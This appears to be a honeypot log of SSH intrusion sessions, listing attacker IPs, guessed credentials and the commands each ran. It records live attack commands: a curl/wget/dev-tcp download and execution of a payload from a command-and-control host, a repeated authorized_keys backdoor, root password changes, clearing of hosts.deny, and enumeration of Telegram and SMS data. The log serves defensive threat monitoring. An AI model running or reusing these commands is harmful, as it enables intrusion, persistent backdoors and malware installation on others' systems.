🎭 specter_db_2 (185.216.119.134) — Morrison Hill, Hong Kong · 1 session · 2 cmds

2026-04-15 06:27 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 liberty_sol_3 (92.118.39.56) — Dallas, United States · 110 sessions · 110 cmds

2026-03-03 21:42 EST · as sol/123, sol/sol, solana/solana

Ran uname 210x across 210 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×110

↳ obfuscated system check

🎭 seoul_root_5 (121.165.204.105) — Seoul, South Korea · 1 session · 9 cmds

2026-04-15 03:53 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 jade_root_8 (118.31.220.143) — Hangzhou, China · 1 session · 5 cmds

2026-04-15 03:24 EDT · as root/123456

echo → payload download from C2 → execute from /tmp → '8

$ echo 1 > /dev/null && cat /bin/echo

$ nohup $SHELL -c "curl http://8.218.225.42:60101/linux -o /tmp/2lvMEQEayO; if [ ! -f /tmp/2lvMEQEayO ]; then wget http://8.218.225.42:60101/linux -O /tmp/2lvMEQEayO; fi; if [ ! -f /tmp/2lvMEQEayO ]; then exec 6<>/dev/tcp/8.218.225.42/60101 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/2lvMEQEayO ; chmod +x /tmp/2lvMEQEayO && /tmp/2lvMEQEayO ebAVOe/Pw6ydxY/M1IncmqXH0es4EbAJCKYKP+7Pw66C2YvNwI7bna/Eweg6FL4JAKAKMePPxq6W3YjLyo3LlLHD0OImFqEAFqEcMODXxKyby4zN1IDdgq3Iz+s/FKoOCKEVMfrTwKeC0ojUyIvegqrJ2+w4FaANGKEcPvTTwqiC2ojM1IranaXH0es4EbAMD74WPOnPwK2bxYnOyoLdnK7F0vowCqIJAL4WOu/Pxa2W3YjLyonLn6bf0O86CqUNFqIXMODXwa6c3pjLyYHFmabf2fQ6FaoOCKEUPfrQwamC2orUy47agq7H2OA/EqgKGKQWJuvYw7Gd2ZbIyInRmq/A0e8oEKcWCqQXJuvWxrGd2InAzIjanKrR1e0mHKYWCacSJujRyKWa24nJyZjanaff0usmFqIIFqEQO+DWxKufy4zN1IDdgq7G1/Q6FKkCDqAVO+nBxaiC2YzI1I3TgqfF2+w4FaABGKEVPPTUxLGd3IjUyIDRlKrB0fo5HKUWCqAWJujTwrGV24LDzI3SjK3D0/Q6EaIWCqgKOujRy6mc2ojP2o7bgq3B1PQ6EKgWD6AePunUw7+d3InUw4jFnazEz+k7HqYICaARKOLPw66UxYnLzpbana7L2eg/ErAAFqESO/TWwrGe2YjAwojZlL/A0+kmFaIBFqIXOPTSw6WV3YHN2onTlLHA0+omFqMNFqETOODWyK2ay4zN1Irfn7HA1u0mFaMJAqYUOerU0aubxYrPzpbcn7HD0O8yE6EID7AVMOzPw6ybxYnKzJbZna7L1+o5FKXeyey1RMArj+k6arZM0tFFENohnr3IWebg+A==; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/2lvMEQEayO && /tmp/2lvMEQEayO ebAVOe/Pw6ydxY/M1IncmqXH0es4EbAJCKYKP+7Pw66C2YvNwI7bna/Eweg6FL4JAKAKMePPxq6W3YjLyo3LlLHD0OImFqEAFqEcMODXxKyby4zN1IDdgq3Iz+s/FKoOCKEVMfrTwKeC0ojUyIvegqrJ2+w4FaANGKEcPvTTwqiC2ojM1IranaXH0es4EbAMD74WPOnPwK2bxYnOyoLdnK7F0vowCqIJAL4WOu/Pxa2W3YjLyonLn6bf0O86CqUNFqIXMODXwa6c3pjLyYHFmabf2fQ6FaoOCKEUPfrQwamC2orUy47agq7H2OA/EqgKGKQWJuvYw7Gd2ZbIyInRmq/A0e8oEKcWCqQXJuvWxrGd2InAzIjanKrR1e0mHKYWCacSJujRyKWa24nJyZjanaff0usmFqIIFqEQO+DWxKufy4zN1IDdgq7G1/Q6FKkCDqAVO+nBxaiC2YzI1I3TgqfF2+w4FaABGKEVPPTUxLGd3IjUyIDRlKrB0fo5HKUWCqAWJujTwrGV24LDzI3SjK3D0/Q6EaIWCqgKOujRy6mc2ojP2o7bgq3B1PQ6EKgWD6AePunUw7+d3InUw4jFnazEz+k7HqYICaARKOLPw66UxYnLzpbana7L2eg/ErAAFqESO/TWwrGe2YjAwojZlL/A0+kmFaIBFqIXOPTSw6WV3YHN2onTlLHA0+omFqMNFqETOODWyK2ay4zN1Irfn7HA1u0mFaMJAqYUOerU0aubxYrPzpbcn7HD0O8yE6EID7AVMOzPw6ybxYnKzJbZna7L1+o5FKXeyey1RMArj+k6arZM0tFFENohnr3IWebg+A==" &

↳ payload download from C2

$ head -c 3716336 > /tmp/9r7pzpBj5Q

↳ execute from /tmp

$ echo 1 > /dev/null && cat /bin/echoQtd#0000

$ >A@/`'8

🎭 wraith_root_37 (23.97.62.135) — Singapore, Singapore · 2 sessions · 2 cmds

2026-04-15 01:59 EDT · as root/123456, root/12345678

pwd → OS/kernel identification

$ pwd

$ uname -a

↳ OS/kernel identification

🎭 tulip_sol_8 (2.57.122.210) — Amsterdam, The Netherlands · 99 sessions · 99 cmds

2026-03-01 00:44 EST · as firedancer/firedancer, raydium/raydium, sol/123

Ran uname 132x across 132 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×99

↳ obfuscated system check

🎭 strudel_root_8 (212.113.104.179) — Frankfurt am Main, Germany · 7 sessions · 7 cmds

2026-04-15 00:45 EDT · as oracle/!QAZ@WSX, oracle/oracle, oracle/qwe123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×7

🎭 cipher_root_50 (190.181.27.27) — La Paz, Bolivia · 1 session · 2 cmds

2026-04-14 23:46 EDT · as oracle/Oracle!@#$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_51 (107.175.59.131) — Dublin, Ireland · 1 session · 1 cmd

2026-04-14 22:51 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 ghost_root_55 (41.214.19.101) — Dakar, Senegal · 1 session · 2 cmds

2026-04-14 22:35 EDT · as oracle/Oracle02!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_15 (39.96.197.8) — Beijing, China · 1 session · 1 cmd

2026-04-14 22:15 EDT · as oracle/Aa123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 kimchi_root_5 (183.110.116.87) — Seongnam-si, South Korea · 1 session · 20 cmds

2026-04-14 21:37 EDT · as admin/123456

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo RSA key → passwd -p 123456 → cat /proc/cpuinfo | grep name | wc -l → free -m | grep Mem → uname -m → top

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "123456\n0lzfEIuSCIqO\n0lzfEIuSCIqO"|passwd|bash

$ Enter new UNIX password:

$ echo "123456\n0lzfEIuSCIqO\n0lzfEIuSCIqO\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 seoul_root_6 (49.247.37.22) — Gwangmyeong, South Korea · 1 session · 19 cmds

2026-04-14 21:10 EDT · as root/12345678

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → cat /proc/cpuinfo | grep name | wc -l → echo "root:XSxZb9Q

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:XSxZb9QPYUO1"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 moose_root_6 (149.56.102.185) — Montreal, Canada · 1 session · 19 cmds

2026-04-14 20:57 EDT · as root/12345678

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:T1pcZ3McKuwL"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 toucan_root_2 (191.5.31.61) — Passo Fundo, Brazil · 2 sessions · 4 cmds

2026-04-06 08:44 EDT · as oracle/oracle10!, oracle/test1234

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 shadow_root_30 (47.236.8.108) — Singapore, Singapore · 1 session · 1 cmd

2026-04-14 18:34 EDT · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_56 (84.74.163.210) — Kloten, Switzerland · 1 session · 9 cmds

2026-04-14 18:33 EDT · as root/root

credential reuse (root/root) → network reconnaissance (ifconfig, /ip cloud print) → OS fingerprinting (uname -a) → hardware profiling (cat /proc/cpuinfo) → cryptominer detection (ps | grep '[Mm]iner', ps -ef | grep '[Mm]iner') → Telegram data enumeration (ls -la ~/.local/share/TelegramDesktop/tdata)

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 lantern_root_15 (117.34.125.173) — Liuxiang, China · 1 session · 20 cmds

2026-04-14 18:08 EDT · as eth/eth

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "eth\nPiaUa83qIh1q\nPiaUa83qIh1q"|passwd|bash

$ Enter new UNIX password:

$ echo "eth\nPiaUa83qIh1q\nPiaUa83qIh1q\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 panda_root_9 (47.107.183.85) — Shenzhen, China · 2 sessions · 2 cmds

2026-04-14 10:28 EDT · as oracle/Oracle123, oracle/oracle@1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 panda_root_10 (47.97.58.151) — Hangzhou, China · 1 session · 1 cmd

2026-04-14 17:05 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wok_root_21 (182.43.235.218) — Jinan, China · 1 session · 3 cmds

2026-04-14 16:50 EDT · as oracle/adminadmin

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

🎭 lantern_root_16 (182.92.141.14) — Beijing, China · 1 session · 1 cmd

2026-04-14 14:18 EDT · as admin/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 stein_root_3 (162.55.94.103) — Falkenstein, Germany · 9 sessions · 9 cmds

2026-04-12 10:52 EDT · as root/1234, root/123456, root/12345678

env inspection → memory audit via free → root filesystem listing → kernel fingerprinting with uname → privilege confirmation via whoami → GPU detection attempt for mining → disk space verification

$ env | head -10

$ free -h | head -2 ×2

$ ls -la / ×2

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lspci | grep -i vga || lspci | grep -i nvidia || echo 'No GPU info'

$ df -h | head -5

🎭 bistro_root_4 (152.89.253.36) — Paris, France · 1 session · 2 cmds

2026-04-14 12:25 EDT · as oracle/oracle!@#$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_16 (116.177.174.231) — Jinrongjie, China · 1 session · 1 cmd

2026-04-14 11:50 EDT · as oracle/1qaz@WSX

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_57 (103.189.208.13) — Sơn Trà, Vietnam · 1 session · 2 cmds

2026-04-14 11:49 EDT · as oracle/Oracle11!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 samba_root_2 (152.250.243.47) — São Paulo, Brazil · 1 session · 2 cmds

2026-04-14 11:44 EDT · as oracle/Oracle11!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_42 (103.176.79.137) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-14 11:30 EDT · as oracle/Oracle11!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_7 (114.8.146.58) — Kebomas, Indonesia · 1 session · 2 cmds

2026-04-14 11:20 EDT · as oracle/Oracle11!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shogun_root (133.117.76.239) — Chiyoda City, Japan · 1 session · 2 cmds

2026-04-14 06:23 EDT · as oracle/Oracle#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

